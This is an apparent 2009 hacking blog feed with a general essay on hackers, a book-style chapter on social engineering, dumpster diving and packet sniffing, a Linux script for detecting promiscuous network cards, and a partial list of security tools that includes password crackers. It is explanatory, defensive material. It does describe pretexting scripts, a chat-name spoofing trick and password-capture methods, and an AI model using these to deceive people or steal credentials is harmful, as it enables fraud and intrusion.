<b>Hacking The Most Wanted........</b><br />Praba.... a Hacker...... (http://www.blogger.com/profile/17884637785245594852), feed last updated 2024-03-13<br /><br /><b>Computer Hacking?</b> (posted 2009-08-29)<br /><p>Computer hacking is most common among teenagers and young adults, although there are many older hackers as well. Many hackers are true technology buffs who enjoy learning more about how computers work and consider computer hacking an “art” form. They often enjoy programming and have expert-level skills in one particular program. For these individuals, computer hacking is a real life application of their problem-solving skills. It’s a chance to demonstrate their abilities, not an opportunity to harm others. </p> <p>Since a large number of hackers are self-taught prodigies, some <a href="http://www.wisegeek.com/what-is-a-corporation.htm">corporations</a> actually employ computer hackers as part of their technical support staff. These individuals use their skills to find flaws in the company’s security system so that they can be repaired quickly. In many cases, this type of computer hacking helps prevent <a href="http://www.wisegeek.com/what-is-identity-theft.htm">identity theft</a> and other serious computer-related crimes.</p> <p>Computer hacking can also lead to other constructive technological developments, since many of the skills developed from hacking apply to more mainstream pursuits. For example, former hackers Dennis Ritchie and Ken Thompson went on to create the UNIX <a href="http://www.wisegeek.com/what-is-an-operating-system.htm">operating system</a> in the 1970s. This system had a huge impact on the development of <a href="http://www.wisegeek.com/what-is-linux.htm">Linux</a>, a free UNIX-like operating system. Shawn Fanning, the creator of Napster, is another <a href="http://www.wisegeek.com/what-is-a-hacker.htm">hacker</a> well known for his accomplishments outside of computer hacking.</p> <p>In comparison to those who develop an interest in computer hacking out of simple intellectual curiosity, some hackers have less noble motives. Hackers who are out to steal personal information, change a <a href="http://www.wisegeek.com/what-is-a-corporation.htm">corporation</a>’s financial data, break security codes to gain unauthorized network access, or conduct other destructive activities are sometimes called “crackers.” This type of computer hacking can earn you a trip to a federal prison for up to 20 years.</p> <p>If you are interested in protecting your home computer against malicious hackers, investing in a good firewall is highly recommended. It’s also a good idea to check your software programs for updates on a regular basis. For example, Microsoft offers a number of free security patches for its Internet Explorer browser.</p>Praba.... 
a Hacker......<br /><br /><b>Diskeeper claims victory over disk fragmentation</b> (posted 2009-08-29)<br /><p> Diskeeper said it has developed a software that prevents up to 85% of disk fragmentation, which should lead to a significant increase in computer system performance. <a href="http://www.computerworld.com/s/article/9137227/Diskeeper_claims_victory_over_disk_fragmentation?taxonomyId=89"> <b> Read more...</b> </a> </p><br /><br /><b>Wireless Hacking Techniques</b> (posted 2009-08-29)<br /><br />A typical hacker attack is not a simple, one-step procedure. It is rare that a hacker can get online or dial up on a remote computer and use only one method to gain full access. It is more likely that the attacker will need several techniques used in combination to bypass the many layers of protection standing between them and root administrative access. 
Therefore, as a security consultant or network administrator, you should be well versed in these occult techniques in order to thwart them. This chapter, which will be a review for advanced users, will introduce the main types of hacker attacks. Expert users will want to skip ahead to the next chapter (Chapter 7, "Wireless Attacks") and go straight for the goodies.<br /><br />The following techniques are not specific to wireless networks. Each of these attacks can take multiple forms, and many can be targeted against both wired and wireless networks. When viewed holistically, your wireless network is just another potential hole for a hacker. Therefore, this chapter will review hacking techniques from a generic perspective.<br /><!--beginpage2--><br /><a name="two"><b>Diverse Hacker Attack Methods</b></a><br /><br />The stereotyped image conjured up by most people when they hear the term "hacker" is that of a pallid, atrophied recluse cloistered in a dank bedroom, whose spotted complexion is revealed only by the unearthly glare of a Linux box used for port scanning with Perl. This mirage might be set off by other imagined features, such as dusty stacks of Dungeons and Dragons lore from the 1980s, empty Jolt Cola cans, and Japanese techno music streaming from the Net.<br /><br />However, although computer skill is central to a hacker's profession, there are many additional facets that he must master. In fact, if all you can do is point and click, you are a script kiddie, not a hacker. A real hacker must also rely on physical and interpersonal skills such as social engineering and other "wet work" that involves human interaction. However, because most people have a false stereotype of hackers, they fail to realize that the person they are chatting with or talking to on the phone might in fact be a hacker in disguise. 
In fact, this common misunderstanding is one of the hackers' greatest assets.<br /><br /><a name="three"><b>Social Engineering</b></a><br /><br />Social engineering is not unique to hacking. In fact, many people use this type of trickery every day, both criminally and professionally. Whether it be haggling for a lower price on a lawn mower at a garage sale, or convincing your spouse you really need that new toy or outfit, you are manipulating the "target." Although your motives might be benign, you are guilty of socially engineering the other party.<br /><br /><a name="four"><b>The Virtual Probe</b></a><br /><br />One example of social engineering that information technology managers face on a weekly basis is solicitation from vendors. An inimical form of sales takes the form of thinly disguised telemarketing. Straying far from ethical standards of sales technique, such vendors will attempt to trick you into giving them information so they can put your company's name on a mailing list.<br />Here is one such attempt that we get regularly:<br />"Hi, this is the copier repair company. We need to get the model of your copier for our service records. Can you get that for us?"<br /><br />Now, this sounds innocent enough, and there are probably many who fall for this tactic. However, they are simply trying to trick you into providing sensitive information, information that they really have no business knowing.<br /><br />Like the scam artist, a hacker often uses similar techniques. A popular method that hackers use is pretending to be a survey company. A hacker can call and ask all kinds of questions about the network operating systems, intrusion detection systems (IDSs), firewalls, and more in the guise of a researcher. If the hacker were really malicious, she could even offer a cash reward for the time it took for the network administrator to answer the questions. 
Unfortunately, most people fall for the bait and reveal sensitive network information.<br /><!--beginpage3--><br /><a name="five"><b>Lost Password</b></a><br /><br />One of the most common goals of a hacker is to obtain a valid user account and password. In fact, sometimes this is the only way a hacker can bypass security measures. If a company uses firewalls, intrusion detection systems, and more, a hacker will need to borrow a real account until he can obtain root access and set up a new account for himself. However, how can a hacker get this information? One of the easiest ways is to trick someone into giving it to them.<br /><br />For example, many organizations use a virtual private network (VPN) that enables remote employees to connect to the network from home and essentially become a part of the local network. This is a very popular method of enabling people to work from home, but is also a potential weak spot in any security perimeter. As VPNs are set up and maintained by the IT department, hackers will often impersonate an actual employee and ask one of the IT staff for the password by pretending to have lost the settings. If the IT employee believes the person, he willingly and often gladly hands over the keys. Voila! The hacker now can connect from anywhere on the Internet and use an authorized account to work his way deeper into the network. Imagine if you were the lowly IT staff person on call and the CEO rang you up at 10:30 p.m. irate about a lost password. Would you want to deny her access, risking the loss of your job? Probably not, which makes this type of fear a hacker's best friend.<br /><br /><a name="six"><b>Chatty Technicians</b></a><br /><br />If you are a home user and think you have nothing to fear from this type of impersonation, think again: you are actually targeted more often by scammers and hackers alike. 
This is because many Internet newcomers (newbies) will believe anything someone appearing to be their ISP's tech support personnel tells them. For example, hackers will often send out mass messages to people, or sit in chat rooms and wait for a newbie to come along. They will then set up a fake account or use simple tricks to make it appear as if an AOL employee is chatting with them. What the newbies do not realize is that they are actually talking with a hacker in disguise. So, they willingly hand over everything from credit cards to user names and passwords. See Figure 1 for an example of how a fake request might appear.<br /><br /><img src="http://www.computerworld.com/computerworld/records/images/chart/06fig01.gif" width="350" border="0" height="281" /><br /><b>Figure 1</b><br /><br />As you can see, to a beginner it appears that an AOL Administrator is on the other side of this conversation. However, if you look closely, you will see a blank line after "Hckr-name:". To make it appear as though an AOL System Administrator is talking, we added a line of space characters to the beginning of the text to drop the "AOL System Administrator:" to the next line. Although the original name does appear, it would not be difficult for a hacker to set up an account using a date or company name to disguise the fact the account was simply another username.<br /><br /><a name="seven"><b>Social Spying</b></a><br /><br />Social spying is the process of "using observation to acquire information." Although social engineering can provide a hacker with crucial information, small businesses are better protected against social engineering because many people in very small companies know each other. For example, if one of the IT staff received a call from a hacker pretending to be a distressed CEO, he would probably recognize the voice as not belonging to the real CEO. 
In this case, social spying becomes more important.<br /><br />To illustrate one of the nontechnical ways social spying can be used, consider how many people handle ATM cards. For example, do you hide your PIN when you take money out at the ATM? Take note of how people protect their PIN the next time you are in line at the ATM. You will probably note most people do not care. Most will whip out their card and punch the numbers without a care for who could be watching. If the wrong person memorized the PIN, he would have all the information needed to access the funds in the account, provided he could first get his hands on the ATM card. Thus, a purse-snatcher would not only get the money just withdrawn from an ATM, but could easily go back and withdraw the entire day's limit.<br /><br />Similarly, hackers socially spy on users as they enter passwords. A "flower delivery" at 8:00 a.m. would give a hacker the necessary excuse to casually stroll through an office building. Although she appears to be looking for the recipient of the flowers, she could be watching for people entering passwords or other sensitive information.<br /><br />In addition to snooping on people as they actively type their user information, most offices have at least several people who are guilty of posting their password on or near their computer monitor. This type of blatant disregard for security is every network administrator's worst nightmare. Regardless of repeated memos, personal visits, and warnings, some people seem to always find an excuse to post their network password right in plain view. Even if some people are at least security-conscious enough to hide their Post-it notes in a discreet place, it still only takes a few seconds to lift up a keyboard or pull open a desk drawer.<br /><br />If you do not believe this, take a quick walk around and see just how many potential security violations are in your office area. 
You might be very surprised to see just what type of information is there for the taking!<br /><!--beginpage4--><br /><a name="eight"><b>Garbage Collecting</b></a><br /><br />Have you ever thrown away a credit card statement without shredding it? If so, you are a potential target. Although you might consider your trash to be sacred territory that no one enters because it is dirty, your trash, and the trash of your company, is often a gold mine. Fishing through garbage to find passwords, also known as dumpster diving, can provide a hacker with the crucial information needed to take over your network.<br /><br />Let's consider a scenario. If you are a network administrator and you receive an anonymous tip that people are posting passwords all around the office, what would you do? Most administrators would immediately investigate and send out a memo to everyone in the company stating that this activity is not allowed, and that violations will be dealt with harshly. Although this might get everyone to temporarily take down their Post-it passwords, the problem has only been exacerbated, for all those passwords are now headed right to the anonymous caller who is waiting at the dumpster.<br /><br />In addition to passwords, hackers can find memos, sensitive reports, diskettes, old hard drives, and more in the trash. Imagine the value an old cash register hard drive could have to a hacker looking for a way to gain access to a company's credit card database. In many cases, a hard drive can simply be installed on another computer and searched using inexpensive (or free) forensics tools.<br /><br /><a name="nine"><b>Sniffing</b></a><br /><br />A sniffer is a program and/or device that monitors all information passing through a computer network. It sniffs the data passing through the network off the wire and determines where the data is going, where it's coming from, and what it is. 
In addition to these basic functions, sniffers might have extra features that enable them to filter a certain type of data, capture passwords, and more. Some sniffers (for example, the FBI's controversial mass-monitoring tool Carnivore) can even rebuild files sent across a network, such as an email or Web page.<br /><br />A sniffer is one of the most important information gathering tools in a hacker's arsenal. The sniffer gives the hacker a complete picture (network topology, IP addresses) of the data sent and received by the computer or network it is monitoring. This data includes, but is not limited to, all email messages, passwords, user names, and documents. With this information, a hacker can form a complete picture of the data traveling on a network, as well as capture important tidbits of data that can help her gain complete control over a network.<br /><br /><a name="ten"><b>How Does a Sniffer Work?</b></a><br /><br />For a computer to have the capability to sniff a network, it must have a network card running in a special mode. This is called promiscuous mode, which means it can receive all the traffic sent across the network. A network card will normally only accept information that has been sent to its specific network address. This network address is properly known as the Media Access Control (MAC) address. You can find your own MAC address by going to the Windows Taskbar and clicking Start → Run and typing winipcfg (for Windows 95/98/ME) or ipconfig /all (for Windows NT/2000/.NET Server). The MAC address is also called the physical address.<br /><br />The only exception to this is what is called monitor mode. This type of network card status only applies to wireless network interface cards (NICs). Because of the unique properties of a wireless network, any data traveling through the airwaves is open to any device that is configured to listen. 
Although a card in promiscuous mode will work in wireless environments, there is no need for it to actually be part of the network. Instead, a WNIC can simply enter a listening status in which it is restricted from sending data out to the network. As you will learn later, a network card in promiscuous mode can be detected because of how it interacts with the network. Monitor mode stops all interaction.<br /><br />There are different layers involved in network communications. Normally, the Network layer is responsible for searching the packets of information for their destination address. This destination address is the MAC address of a computer. There is a unique MAC address for every network card in the world. Although you can change the address, the MAC address ensures that the data is delivered to the right computer. If a computer's address does not match the address in the packet, the data is normally ignored.<br /><br />The reason a network card has this option to run in promiscuous mode is for troubleshooting purposes. Normally, a computer does not want or need information to be sent to other computers on the network. However, in the event that something goes wrong with the network wiring or hardware, it is important for a network technician to look inside the data traveling on the network to see what is causing the problem. For example, one common indication of a bad network card is when computers start to have a difficult time transferring data. This could be the result of information overload on the network wires. The flood of data would jam the network and stop any productive communication. After a technician plugs in a computer with the capability to examine the network, he would quickly pinpoint the origin of the corrupt data, and thus the location of the broken network card. 
He could then simply replace the bad card and everything would be back to normal.<br /><br />Another way to visualize a sniffer is to consider two different personality types at a cocktail party. One type is the person who listens and replies to conversations in which he is actively involved. This is how a network card is supposed to work on your local machine. It is supposed to listen and reply to information sent directly to it.<br /><br />On the other hand, there are those people at the party who stand quietly and listen to everyone's conversation. This person could be compared to a network card running in promiscuous mode. Furthermore, if this eavesdropper listened for a specific subject only, she could be compared to a sniffer that captures all data related to passwords only.<br /><br /><a name="eleven"><b>How Hackers Use Sniffers</b></a><br /><br />Figure 2 shows a sniffer in action. As previously mentioned, sniffers like this are used every day to troubleshoot faulty equipment and monitor network traffic. Hackers can use this or similar tools to peer inside a network. However, they are not out to troubleshoot. Instead, they are out to glean passwords and other gems.<br /><br /><img src="http://www.computerworld.com/computerworld/records/images/chart/06fig03.gif" width="450" border="0" height="311" /><br /><b>Figure 2</b><br /><br />Depending on the program a hacker is using, he will get something that looks like Figure 2. As you can see from the figure, some data is easily readable, while some data is not. The difference is in the type of data that is sent. Computers can send information either in plain text or in an encrypted form. The sample capture shows just how easy it is to read captured plaintext data.<br /><br />Plaintext communication is any information that is sent just as it appears to the human eye. For most applications, this is the standard means of data transfer. For example, the Internet uses plaintext for most of its communications. 
This is the fastest way to send data. Chat programs, email, Web pages and a multitude of other programs send their information in plaintext. This is acceptable for most situations; however, it becomes a problem when transmitting sensitive information, such as a bank account number or a password.<br /><br />For example, take our sniffer screenshot in Figure 2. If you look closely at the plaintext section, you can see just how dangerous a sniffer can be to sensitive information. In the plaintext, you can see the following: Our company will be merging with another company. This will make our stock $$. Don't tell anyone. If this were a real merger, a hacker could make millions overnight.<br /><br />In addition, email clients and FTP clients do not normally encrypt their passwords; this makes them two of the most commonly sniffed programs on a network. Other commonly used programs such as Telnet, Web browsers, and news programs also send their passwords as plaintext. So, if a hacker successfully installs a sniffer on your network, he would soon have a list of passwords and user names that he could exploit.<br /><br />Even some encrypted passwords used in a Windows NT network can be sniffed. Thanks to the rather well-known encryption scheme of an NT password, it does not take long to capture and decrypt more than enough NT passwords to break a network wide open. In fact, there are even sniffing programs that have an NT password cracker built right into them. The programs are designed to be very user friendly so that network administrators can test their networks for weak passwords. Unfortunately, these programs often end up in the hands of script kiddies who can just as easily use them to cause problems.<br /><br />Although sniffers most commonly show up within closed business networks, they can also be used throughout the Internet. As mentioned previously, the FBI has a program that will capture all the information both coming from and going to computers online. 
This tool, previously known as Carnivore, simply has to be plugged in and turned on. Although it is purported to filter out any information that is not the target's, this tool actually captures everything traveling through whatever wire to which it is connected and then filters it according to the rules set up in the program. Thus, Carnivore can potentially capture all of those passwords, email messages, and chat sessions passing through its connection.<br /><br />In addition to wired networks, sniffers can also be used in wireless networks. In effect, a wireless network on a corporate LAN is like putting an Ethernet jack in your parking lot. What makes this unique from a hacker's perspective is that sniffing a wireless network is probably not illegal, although it has yet to be tested in court. In many ways, it is no different than a police scanner used by reporters and hobbyists worldwide. If the information is sent in plaintext to the public domain, how can it be wrong to simply listen?<br /><br /><a name="twelve"><b>How to Detect a Sniffer</b></a><br /><br />There are a few ways a network technician can detect a NIC running in promiscuous mode. One way is to physically check all the local computers for any sniffer devices or programs. There are also software detection programs that can scan networks for devices that are running sniffer programs (for example, AntiSniff). These scanner programs use different aspects of the Domain Name Service and TCP/IP components of a network system to detect any malicious programs or devices that are capturing packets (running in promiscuous mode). However, for the average home user, there is really no way to detect whether a computer out on the Internet is sniffing your information. This is why encryption is strongly recommended.<br /><br /><a name="thirteen"><b>How Can I Block Sniffers?</b></a><br /><br />There is really only one way to protect your information from being sniffed: Use encryption! 
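<br /><br />The local check described under "How to Detect a Sniffer" above, as an added example that is not part of the original article: on a Linux host it reads each interface's flags from sysfs for the promiscuous bit and lists packet sockets that receive every protocol from /proc/net/packet. The function names are hypothetical and the sample inputs are constructed.

```python
"""Local sniffer triage on Linux: promiscuous NICs and capture-all packet sockets.

Added example; function names and sample data are constructed for illustration.
"""
import os
import tempfile

IFF_PROMISC = 0x100  # interface flag bit from <linux/if.h>
ETH_P_ALL = 0x0003   # packet-socket protocol meaning "every frame" (<linux/if_ether.h>)

# Constructed sample in the layout of /proc/net/packet (not taken from a real host).
SAMPLE_PROC_NET_PACKET = """\
sk               RefCnt Type Proto  Iface R Rmem   User   Inode
ffff8881039c2000 3      3    0003   2     1 0      0      48211
ffff8881039c2800 3      2    888e   3     1 0      0      31750
ffff8881039c3000 3      3    0003   0     1 0      1000   52904
"""


def flags_promiscuous(flags_text):
    """Return True if a sysfs flags value such as '0x1103' has IFF_PROMISC set."""
    return bool(int(flags_text.strip(), 16) & IFF_PROMISC)


def promiscuous_interfaces(sysfs_net="/sys/class/net"):
    """Return the sorted names of interfaces whose flags include IFF_PROMISC."""
    found = []
    for iface in sorted(os.listdir(sysfs_net)):
        path = os.path.join(sysfs_net, iface, "flags")
        try:
            with open(path) as fh:
                if flags_promiscuous(fh.read()):
                    found.append(iface)
        except (OSError, ValueError):
            continue  # unreadable or malformed entry: skip it, do not guess
    return found


def capture_all_sockets(proc_text):
    """Parse /proc/net/packet text; return (ifindex, uid, inode) per ETH_P_ALL socket.

    ifindex 0 means the socket is not bound to one interface.
    """
    hits = []
    for line in proc_text.strip().splitlines()[1:]:  # first line is the header
        fields = line.split()
        if len(fields) < 9:
            continue
        try:
            proto = int(fields[3], 16)
            row = (int(fields[4]), int(fields[7]), int(fields[8]))
        except ValueError:
            continue
        if proto == ETH_P_ALL:
            hits.append(row)
    return hits


def build_sample_sysfs():
    """Create a constructed /sys/class/net look-alike; eth0 is the promiscuous one."""
    root = tempfile.mkdtemp(prefix="sysfs-net-")
    for iface, flags in (("lo", "0x9"), ("eth0", "0x1103"), ("wlan0", "0x1003")):
        os.makedirs(os.path.join(root, iface))
        with open(os.path.join(root, iface, "flags"), "w") as fh:
            fh.write(flags + "\n")
    return root


if __name__ == "__main__":
    live = os.path.isdir("/sys/class/net") and os.path.isfile("/proc/net/packet")
    if live:
        sysfs_root = "/sys/class/net"
        with open("/proc/net/packet") as fh:
            packet_text = fh.read()
    else:
        sysfs_root = build_sample_sysfs()
        packet_text = SAMPLE_PROC_NET_PACKET
    print("source:", "live host" if live else "constructed sample")
    print("promiscuous interfaces:", promiscuous_interfaces(sysfs_root))
    for ifindex, uid, inode in capture_all_sockets(packet_text):
        print("capture-all socket: ifindex=%d uid=%d inode=%d" % (ifindex, uid, inode))
```

A promiscuous flag or a capture-all socket is a lead to follow up, not proof of a sniffer, since DHCP clients and monitoring agents also open packet sockets.<br /><br />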
Using Secure Sockets Layer (SSL)-protected Web sites and other protection tools, you can encrypt your passwords, email messages and chat sessions. There are many programs available for free that are easy to use. Although you do not always need to protect the information passed during a chat session with your friends, you should at least have the option available when needed.<br /><br />Because of the very nature of a WLAN, encryption is a must in any situation. Fortunately, wireless networks come with the option of encryption built right into their software. However, few take advantage of this capability, as few are even aware that this option exists.<br /><br />Praba.... a Hacker...... (http://www.blogger.com/profile/17884637785245594852)<hr /><b>Top 100 Network Security Tools 76-100</b> (published 2009-07-29T05:26:00.002-07:00, updated 2009-07-29T05:27:16.445-07:00)<br /><br /><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#76</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://portswigger.net/suite/">Burpsuite</a> : An integrated platform for attacking web applications<br />Burp suite allows an attacker to combine manual and automated techniques to enumerate, analyze, attack and exploit web applications. 
The various burp tools work together effectively to share information and allow findings identified within one tool to form the basis of an attack using another. <p>See all <a href="http://sectools.org/web-scanners.html">web vulnerability scanners</a> </p></td></tr></tbody></table><hr /><a name="brutus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#77</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">32</span><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /> </td><td valign="top"> <a href="http://www.hoobie.net/brutus/">Brutus</a> : A network brute-force authentication cracker<br />This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at <a href="http://sectools.org/index.html#hydra">THC Hydra</a>. 
<p>See all <a href="http://sectools.org/crackers.html">password crackers</a> </p></td></tr></tbody></table><hr /><a name="unicornscan"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#78</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.unicornscan.org/"><img src="http://mirror.sectools.org/logos/unicornscan-71x66.png" align="right" border="0" width="71" height="66" /></a> <a href="http://www.unicornscan.org/">Unicornscan</a> : Not your mother's port scanner<br />Unicornscan is an attempt at a User-land Distributed TCP/IP stack for information gathering and correlation. It is intended to provide a researcher a superior interface for introducing a stimulus into and measuring a response from a TCP/IP enabled device or network. Some of its features include asynchronous stateless TCP scanning with all variations of TCP flags, asynchronous stateless TCP banner grabbing, and active/passive remote OS, application, and component identification by analyzing responses. Like <a href="http://sectools.org/tools4.html#scanrand">Scanrand</a>, it isn't for the faint of heart. 
<p>See all <a href="http://sectools.org/port-scanners.html">port scanners</a> </p></td></tr></tbody></table><hr /><a name="stunnel"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#79</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">33</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.stunnel.org/"><img src="http://mirror.sectools.org/logos/stunnel-32x32.png" align="right" border="0" width="32" height="32" /></a> <a href="http://www.stunnel.org/">Stunnel</a> : A general-purpose SSL cryptographic wrapper<br />The stunnel program is designed to work as an SSL encryption wrapper between remote client and local (inetd-startable) or remote server. It can be used to add SSL functionality to commonly used inetd daemons like POP2, POP3, and IMAP servers without any changes in the programs' code. It will negotiate an SSL connection using the <a href="http://sectools.org/tools2.html#openssl">OpenSSL</a> or SSLeay libraries. 
<p>See all <a href="http://sectools.org/crypto.html">encryption tools</a> </p></td></tr></tbody></table><hr /><a name="honeyd"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#80</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">37</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.citi.umich.edu/u/provos/honeyd/"><img src="http://mirror.sectools.org/logos/honeyd-80x81.png" align="right" border="0" width="80" height="81" /></a> <a href="http://www.citi.umich.edu/u/provos/honeyd/">Honeyd</a> : Your own personal <a href="http://www.honeynet.org/">honeynet</a><br />Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be configured to run arbitrary services, and their TCP personality can be adapted so that they appear to be running certain versions of operating systems. Honeyd enables a single host to claim multiple addresses on a LAN for network simulation. It is possible to ping the virtual machines, or to traceroute them. Any type of service on the virtual machine can be simulated according to a simple configuration file. It is also possible to proxy services to another machine rather than simulating them. It has many library dependencies, which can make compiling/installing Honeyd difficult. 
</td></tr></tbody></table><hr /><a name="fping"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#81</span><br /><img src="http://mirror.sectools.org/flags/down_r_10x14.gif" width="10" height="14" /><span style="color:#cc0000;">25</span><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.fping.com/">Fping</a> : A parallel ping scanning program<br />fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. 
</td></tr></tbody></table><hr /><a name="base"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#82</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/mouse-30x30.png" alt="GUI Interface" title="GUI Interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://sourceforge.net/projects/secureideas/">BASE</a> : The Basic Analysis and Security Engine<br />BASE is a PHP-based analysis engine to search and process a database of security events generated by various IDSs, firewalls, and network monitoring tools. Its features include a query-builder and search interface for finding alerts matching different patterns, a packet viewer/decoder, and charts and statistics based on time, sensor, signature, protocol, IP address, etc. 
<p>See all <a href="http://sectools.org/ids.html">intrusion detection systems</a> </p></td></tr></tbody></table><hr /><a name="argus"> </a><table><tbody><tr valign="top"><td valign="top" width="30"><span style="font-size:+1;">#83</span><br /><img src="http://mirror.sectools.org/flags/new_28x11.gif" alt="new" width="28" height="11" /><br /><img src="http://mirror.sectools.org/flags/linuxpenguinlogo_30x30.gif" alt="Linux" title="Runs on Linux" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/openbsdheadlogo_30x30.gif" alt="*BSD" title="Runs on *BSD" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/osx-30x30.png" alt="OS X" title="Runs on Mac OS X" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/winlogo_30x30.gif" alt="Windows" title="Runs on Windows" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/term-30x30.png" alt="Command-line interface" title="Command-line interface" width="30" height="30" /><br /><img src="http://mirror.sectools.org/flags/magnifying-glass-30x19.png" alt="Source code" title="Source code available" width="30" height="19" /> </td><td valign="top"> <a href="http://www.qosient.com/argus/"><img src="http://mirror.sectools.org/logos/argus-80x36.png" align="right" border="0" width="80" height="36" /></a> <a href="http://www.qosient.com/argus/">Argus</a> : A generic IP network transaction auditing tool<br />Argus is a fixed-model Real Time Flow Monitor designed to track and report on the status and performance of all network transactions seen in a data network traffic stream. Argus provides a common data format for reporting flow metrics such as connectivity, capacity, demand, loss, delay, and jitter on a per transaction basis. The record format that Argus uses is flexible and extensible, supporting generic flow identifiers and metrics, as well as application/protocol specific information. 
